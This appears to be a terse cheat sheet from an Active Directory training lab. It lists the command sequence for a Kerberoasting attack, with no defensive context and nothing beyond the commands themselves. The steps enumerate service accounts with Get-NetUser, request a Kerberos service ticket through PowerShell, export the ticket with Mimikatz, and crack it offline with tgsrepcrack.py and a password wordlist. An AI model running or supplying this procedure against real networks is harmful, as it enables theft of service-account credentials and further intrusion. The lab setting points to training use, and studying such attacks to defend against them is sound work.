Find User Accounts
Get-NetUser -SPN
Request Ticket For Service
Add-Type -AssemblyNAme System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"
klist
Dump Ticket
Invoke-Mimikatz -Command '"kerberos::list /export"'
Crack Password
python.exe .\\tgsrepcrack.py .\\10k-worst-pass.txt .\\1-40a10000-student648@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi
Deep Dive into Kerberoasting Attack